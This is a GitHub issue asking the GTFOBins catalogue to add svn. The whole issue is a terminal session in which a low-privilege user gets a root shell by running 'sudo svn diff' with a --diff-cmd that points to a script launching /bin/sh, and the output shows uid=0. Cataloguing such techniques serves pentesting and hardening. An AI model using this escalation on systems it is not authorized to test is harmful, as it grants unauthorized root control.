GTFOBins.github.io icon indicating copy to clipboard operation
GTFOBins.github.io copied to clipboard

Add svn

Open Frissi0n opened this issue 11 months ago • 0 comments

lowpriv@7dc99421ba84:/tmp/working$         TD=$(mktemp -d)
        svnadmin create $TD/pwn
        svn checkout file:///$TD/pwn $TD/project
        echo -e '#!/bin/bash\n/bin/sh' > $TD/shell
        chmod +x $TD/shell
        sudo svn diff --diff-cmd "$TD/shell"
Checked out revision 0.
Index: c
===================================================================
# id
uid=0(root) gid=0(root) groups=0(root)

Frissi0n avatar Nov 11 '24 20:11 Frissi0n